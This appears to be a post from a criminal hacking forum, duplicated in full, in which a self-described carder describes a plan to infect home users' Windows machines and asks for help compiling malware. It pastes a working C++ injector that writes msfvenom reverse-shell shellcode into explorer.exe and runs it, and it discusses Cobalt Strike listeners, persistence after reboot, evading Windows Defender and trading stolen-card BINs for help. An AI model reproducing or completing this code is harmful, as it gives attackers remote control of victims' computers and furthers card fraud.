Hello everyone
look first what I want say i don't have any previous knowledge to create less detectable Malware I have knowledge is only at fraud/carding setup and setting but malwares is different niche
i work on Arch linux that's my main distro where I run Virtual Machines ( Windows7/10/11 ) i don't have any knowledge with coding/programming but I want to get after I earn decent money to move from state and start somewhere else
that's not important i was just want to imagine how much bad I am and many information on which I be asked could be total bullshits,anyways my poor English kill that level more
sorry for English and format text I write that at 3am morning
i create my personal plan and idea called 3 steps to earn
- Listener
- Make less detectable
- Share
its sounds probably easy but i fighting with that almost one month on step Listener i was not sure what exactly use like total oldschooler i was used Metasploit-framework,Cracked Venom Rat after some time some users on xss.pro share Cobalt strike like first moment i was confused because its generate http-reverse tcp and on Youtube tutorials/guides on clear-net everyone use reverse TCP i don't really understand why when its works same ( from my view )
for example can someone explain me why tutorials use reverse-tcp when reverse-http works same ? ( from my view )
one week i solving how port-forward and hack computers what not on my network simple i was use switch from Arch vps to debian and it was start work without problem some days i solved why cobalt its not persistent/permanent why after victim reboot pc,not loaded again but again some users was help me so when you read that,Thanks once again
my previous posts https://xss.pro/threads/81630/ , https://xss.pro/threads/81342/
step make less detectable look i don't be focused companies/bussiness mans so i don't need really 0/26 FUD from my personal experience most important is Windows defender some users use avast.eset ( based USA ) so i dont need really fud,i searching on this forums or even clearnet and i found some scripts let me paste
#include <iostream>
#include <Windows.h>
#include <tlhelp32.h>
#include <locale>
#include <string>
using namespace std;
HANDLE GetProcesHandleName() {
HANDLE ProcessHandle;
PROCESSENTRY32 procEntry;
procEntry.dwSize = sizeof(PROCESSENTRY32);
HANDLE allProcesses;
allProcesses = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
if (Process32First(allProcesses, &procEntry) == TRUE) {
while (Process32Next(allProcesses, &procEntry) == TRUE) {
wchar_t newtargetProcName[1024] = L"explorer.exe";
if (wcscmp(procEntry.szExeFile, newtargetProcName) == 0) {
cout << "Process ID Found! PID: " << procEntry.th32ProcessID << "\n";
ProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, procEntry.th32ProcessID);
return ProcessHandle;
}
}
}
}
int main()
{
HANDLE hProcess;
SIZE_T dwSize = 461;
DWORD flAllocationType = MEM_COMMIT | MEM_RESERVE;
DWORD flProtect = PAGE_EXECUTE_READWRITE;
LPVOID memAddr;
SIZE_T bytesOut;
hProcess = GetProcesHandleName();
// msfvenom -p windows/x64/shell_reverse_tcp LHOST=xx.xx.xx.xx LPORT=1337 -f c
unsigned char buf[] =
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33"
"\x32\x00\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00"
"\x49\x89\xe5\x49\xbc\x02\x00\x05\x39\x23\xaa\xf5\x3e\x41\x54"
"\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x4c"
"\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b\x00\xff"
"\xd5\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89\xc2"
"\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0\xff\xd5\x48"
"\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2\x48\x89\xf9\x41\xba\x99"
"\xa5\x74\x61\xff\xd5\x48\x81\xc4\x40\x02\x00\x00\x49\xb8\x63"
"\x6d\x64\x00\x00\x00\x00\x00\x41\x50\x41\x50\x48\x89\xe2\x57"
"\x57\x57\x4d\x31\xc0\x6a\x0d\x59\x41\x50\xe2\xfc\x66\xc7\x44"
"\x24\x54\x01\x01\x48\x8d\x44\x24\x18\xc6\x00\x68\x48\x89\xe6"
"\x56\x50\x41\x50\x41\x50\x41\x50\x49\xff\xc0\x41\x50\x49\xff"
"\xc8\x4d\x89\xc1\x4c\x89\xc1\x41\xba\x79\xcc\x3f\x86\xff\xd5"
"\x48\x31\xd2\x48\xff\xca\x8b\x0e\x41\xba\x08\x87\x1d\x60\xff"
"\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff\xd5\x48"
"\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13"
"\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5";
memAddr = VirtualAllocEx(hProcess, NULL, dwSize,flAllocationType,flProtect);
cout << "[+] Memory Allocated at:" << memAddr << "\n";
WriteProcessMemory(hProcess, memAddr, buf, dwSize, &bytesOut);
cout << "[+] Number of bytes written: " << bytesOut << "\n";
CreateRemoteThread(hProcess, NULL, dwSize, (LPTHREAD_START_ROUTINE)memAddr, 0, 0, 0);
return 0;
}
so this is very trivial code but i don't care i was want just build it like guides say but there i get complications which i cannot solve
like first one i was use Visual studio code and think its same like Visual code but its something else i don't know why Microsoft named is so much similar
on Linux i get errors like windows.h because native Linux don't have it so I read like use wine and generate it or even GCC but its so much complicate and each try to build it give me different error
( i really don't understand that properly so sorry when its bullshits or not correct info )
i was read people recommend to use Windows to build so i start VM
Windows 7 probably not support Visual code 2019 i was manually installed net framework but not works
Windows10 is for me most shitty windows because some net frameworks like 3.7 or 4.7.2 was not supported so i was just WTF when some other people it was works
i followed some videos how enable it but its not work and be honest Windows its most boring OS and i hate it
now biggest fun Windows 11 which is total spyware with 4096ram 3 cpu its lagging and start lag too my main Linux so its very hard to even run Windows11 when i run Visual code,its get spikes,or even Oracle VM stopped working,for this reason I respect only Windows 7 what is good too for opsec
so my question is what do ? some ideas tips or even when someone share me guide or recommend me something
i be never think build/compile project in from c++ to exe can be so much complicated and its almost one week what i cannot move
I want thanks everyone who helped me previous times or even just give me info because i respect this forum i be write some carding/fraud guide like one month ago
or even i can share non-vbv bins when someone really help me
anyways when someone with this knowledge want help with carding i be do that ( simple you help me i be help you )
Thanks once again,Made by Backstab
about tommorow i be edit this post and write more formal and correct
look first what I want say i don't have any previous knowledge to create less detectable Malware I have knowledge is only at fraud/carding setup and setting but malwares is different niche
i work on Arch linux that's my main distro where I run Virtual Machines ( Windows7/10/11 ) i don't have any knowledge with coding/programming but I want to get after I earn decent money to move from state and start somewhere else
that's not important i was just want to imagine how much bad I am and many information on which I be asked could be total bullshits,anyways my poor English kill that level more
sorry for English and format text I write that at 3am morning
i create my personal plan and idea called 3 steps to earn
- Listener
- Make less detectable
- Share
its sounds probably easy but i fighting with that almost one month on step Listener i was not sure what exactly use like total oldschooler i was used Metasploit-framework,Cracked Venom Rat after some time some users on xss.pro share Cobalt strike like first moment i was confused because its generate http-reverse tcp and on Youtube tutorials/guides on clear-net everyone use reverse TCP i don't really understand why when its works same ( from my view )
for example can someone explain me why tutorials use reverse-tcp when reverse-http works same ? ( from my view )
one week i solving how port-forward and hack computers what not on my network simple i was use switch from Arch vps to debian and it was start work without problem some days i solved why cobalt its not persistent/permanent why after victim reboot pc,not loaded again but again some users was help me so when you read that,Thanks once again
my previous posts https://xss.pro/threads/81630/ , https://xss.pro/threads/81342/
step make less detectable look i don't be focused companies/bussiness mans so i don't need really 0/26 FUD from my personal experience most important is Windows defender some users use avast.eset ( based USA ) so i dont need really fud,i searching on this forums or even clearnet and i found some scripts let me paste
#include <iostream>
#include <Windows.h>
#include <tlhelp32.h>
#include <locale>
#include <string>
using namespace std;
HANDLE GetProcesHandleName() {
HANDLE ProcessHandle;
PROCESSENTRY32 procEntry;
procEntry.dwSize = sizeof(PROCESSENTRY32);
HANDLE allProcesses;
allProcesses = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
if (Process32First(allProcesses, &procEntry) == TRUE) {
while (Process32Next(allProcesses, &procEntry) == TRUE) {
wchar_t newtargetProcName[1024] = L"explorer.exe";
if (wcscmp(procEntry.szExeFile, newtargetProcName) == 0) {
cout << "Process ID Found! PID: " << procEntry.th32ProcessID << "\n";
ProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, procEntry.th32ProcessID);
return ProcessHandle;
}
}
}
}
int main()
{
HANDLE hProcess;
SIZE_T dwSize = 461;
DWORD flAllocationType = MEM_COMMIT | MEM_RESERVE;
DWORD flProtect = PAGE_EXECUTE_READWRITE;
LPVOID memAddr;
SIZE_T bytesOut;
hProcess = GetProcesHandleName();
// msfvenom -p windows/x64/shell_reverse_tcp LHOST=xx.xx.xx.xx LPORT=1337 -f c
unsigned char buf[] =
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33"
"\x32\x00\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00"
"\x49\x89\xe5\x49\xbc\x02\x00\x05\x39\x23\xaa\xf5\x3e\x41\x54"
"\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x4c"
"\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b\x00\xff"
"\xd5\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89\xc2"
"\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0\xff\xd5\x48"
"\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2\x48\x89\xf9\x41\xba\x99"
"\xa5\x74\x61\xff\xd5\x48\x81\xc4\x40\x02\x00\x00\x49\xb8\x63"
"\x6d\x64\x00\x00\x00\x00\x00\x41\x50\x41\x50\x48\x89\xe2\x57"
"\x57\x57\x4d\x31\xc0\x6a\x0d\x59\x41\x50\xe2\xfc\x66\xc7\x44"
"\x24\x54\x01\x01\x48\x8d\x44\x24\x18\xc6\x00\x68\x48\x89\xe6"
"\x56\x50\x41\x50\x41\x50\x41\x50\x49\xff\xc0\x41\x50\x49\xff"
"\xc8\x4d\x89\xc1\x4c\x89\xc1\x41\xba\x79\xcc\x3f\x86\xff\xd5"
"\x48\x31\xd2\x48\xff\xca\x8b\x0e\x41\xba\x08\x87\x1d\x60\xff"
"\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff\xd5\x48"
"\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13"
"\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5";
memAddr = VirtualAllocEx(hProcess, NULL, dwSize,flAllocationType,flProtect);
cout << "[+] Memory Allocated at:" << memAddr << "\n";
WriteProcessMemory(hProcess, memAddr, buf, dwSize, &bytesOut);
cout << "[+] Number of bytes written: " << bytesOut << "\n";
CreateRemoteThread(hProcess, NULL, dwSize, (LPTHREAD_START_ROUTINE)memAddr, 0, 0, 0);
return 0;
}
so this is very trivial code but i don't care i was want just build it like guides say but there i get complications which i cannot solve
like first one i was use Visual studio code and think its same like Visual code but its something else i don't know why Microsoft named is so much similar
on Linux i get errors like windows.h because native Linux don't have it so I read like use wine and generate it or even GCC but its so much complicate and each try to build it give me different error
( i really don't understand that properly so sorry when its bullshits or not correct info )
i was read people recommend to use Windows to build so i start VM
Windows 7 probably not support Visual code 2019 i was manually installed net framework but not works
Windows10 is for me most shitty windows because some net frameworks like 3.7 or 4.7.2 was not supported so i was just WTF when some other people it was works
i followed some videos how enable it but its not work and be honest Windows its most boring OS and i hate it
now biggest fun Windows 11 which is total spyware with 4096ram 3 cpu its lagging and start lag too my main Linux so its very hard to even run Windows11 when i run Visual code,its get spikes,or even Oracle VM stopped working,for this reason I respect only Windows 7 what is good too for opsec
so my question is what do ? some ideas tips or even when someone share me guide or recommend me something
i be never think build/compile project in from c++ to exe can be so much complicated and its almost one week what i cannot move
I want thanks everyone who helped me previous times or even just give me info because i respect this forum i be write some carding/fraud guide like one month ago
or even i can share non-vbv bins when someone really help me
anyways when someone with this knowledge want help with carding i be do that ( simple you help me i be help you )
Thanks once again,Made by Backstab
about tommorow i be edit this post and write more formal and correct
Последнее редактирование:
